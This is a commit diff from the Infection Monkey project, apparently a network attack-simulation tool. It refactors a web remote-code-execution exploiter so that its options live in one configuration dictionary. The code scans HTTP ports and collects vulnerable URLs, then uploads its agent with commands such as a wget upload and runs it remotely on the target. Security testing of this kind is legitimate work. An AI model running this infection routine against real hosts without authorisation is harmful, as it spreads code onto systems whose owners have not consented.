Refactored exploit_host and added get_exploit_config

2018-08-22 13:33:36 +03:00 · 2018-08-22 13:33:36 +03:00 · eae3f3440d
parent 911404ef68
commit eae3f3440d
1 changed files with 35 additions and 21 deletions
--- a/infection_monkey/exploit/web_rce.py
+++ b/infection_monkey/exploit/web_rce.py
@ -37,37 +37,51 @@ class WebRCE(HostExploiter):
        self.HTTP = [str(port) for port in self._config.HTTP_PORTS]
        self.skip_exist = self._config.skip_exploit_if_file_exist

+    @staticmethod
+    def get_exploit_config():
+        """
+        Method that creates a dictionary of configuration values for exploit
+        :return: configuration dict
+        """
+        exploit_config = dict()
+
+        # dropper: If true monkey will use dropper parameter that will detach monkey's process and try to copy
+        # it's file to the default destination path.
+        exploit_config['dropper'] = False
+
+        # upload_commands: Unformatted dict with one or two commands {'linux': WGET_HTTP_UPLOAD,'windows': WIN_CMD}
+        # Command must have "monkey_path" and "http_path" format parameters. If None defaults will be used.
+        exploit_config['upload_commands'] = None
+
+        # url_extensions: What subdirectories to scan (www.domain.com[/extension]). Eg. ["home", "index.php"]
+        exploit_config['url_extensions'] = None
+
+        # stop_checking_urls: If true it will stop checking vulnerable urls once one was found vulnerable.
+        exploit_config['stop_checking_urls'] = False
+
+        # blind_exploit: If true we won't check if file exist and won't try to get the architecture of target.
+        exploit_config['blind_exploit'] = False
+
+        return exploit_config
+
    def exploit_host(self):
        """
        Override this method to pass custom arguments to default_exploit_host
        :return: True if exploited, False otherwise
        """
-        return self.default_exploit_host()
-
-    def default_exploit_host(self, dropper=False, upload_commands=None, url_extensions=None,
-                             stop_checking_urls=False, blind_exploit=False):
-        """
-        Standard framework usage (call this method in exploit_host function):
-        :param dropper: If true monkey will use dropper parameter that will detach monkey's process and try to copy
-        it's file to the default destination path.
-        :param upload_commands: Unformatted dict with one or two commands {'linux': WGET_HTTP_UPLOAD,'windows': WIN_CMD}
-        Command must have "monkey_path" and "http_path" format parameters.
-        :param url_extensions: What subdirectories to scan (www.domain.com[/extension]). Eg. ["home", "index.php"]
-        :param stop_checking_urls: If true it will stop checking vulnerable urls once one was found vulnerable.
-        :param blind_exploit: If true we won't check if file exist and won't try to get the architecture of target.
-        :return: True if exploited and False otherwise.
-        """
+        # We get exploit configuration
+        exploit_config = self.get_exploit_config()
        # Get open ports
        ports = self.get_ports_w(self.HTTP, ["http"])
        if not ports:
            return False
        # Get urls to try to exploit
-        urls = self.build_potential_urls(ports, url_extensions)
+        urls = self.build_potential_urls(ports, exploit_config['url_extensions'])
        vulnerable_urls = []
        for url in urls:
            if self.check_if_exploitable(url):
                vulnerable_urls.append(url)
-                if stop_checking_urls:
+                if exploit_config['stop_checking_urls']:
                    break
        self._exploit_info['vulnerable_urls'] = vulnerable_urls

@ -75,16 +89,16 @@ class WebRCE(HostExploiter):
            return False

        # Skip if monkey already exists and this option is given
-        if not blind_exploit and self.skip_exist and self.check_remote_files(vulnerable_urls[0]):
+        if not exploit_config['blind_exploit'] and self.skip_exist and self.check_remote_files(vulnerable_urls[0]):
            LOG.info("Host %s was already infected under the current configuration, done" % self.host)
            return True

        # Check for targets architecture (if it's 32 or 64 bit)
-        if not blind_exploit and not self.set_host_arch(vulnerable_urls[0]):
+        if not exploit_config['blind_exploit'] and not self.set_host_arch(vulnerable_urls[0]):
            return False

        # Upload the right monkey to target
-        data = self.upload_monkey(vulnerable_urls[0], upload_commands)
+        data = self.upload_monkey(vulnerable_urls[0], exploit_config['upload_commands'])

        if data is not False and data['response'] is False:
            return False
@ -94,7 +108,7 @@ class WebRCE(HostExploiter):
            return False

        # Execute remote monkey
-        if self.execute_remote_monkey(vulnerable_urls[0], data['path'], dropper) is False:
+        if self.execute_remote_monkey(vulnerable_urls[0], data['path'], exploit_config['dropper']) is False:
            return False

        return True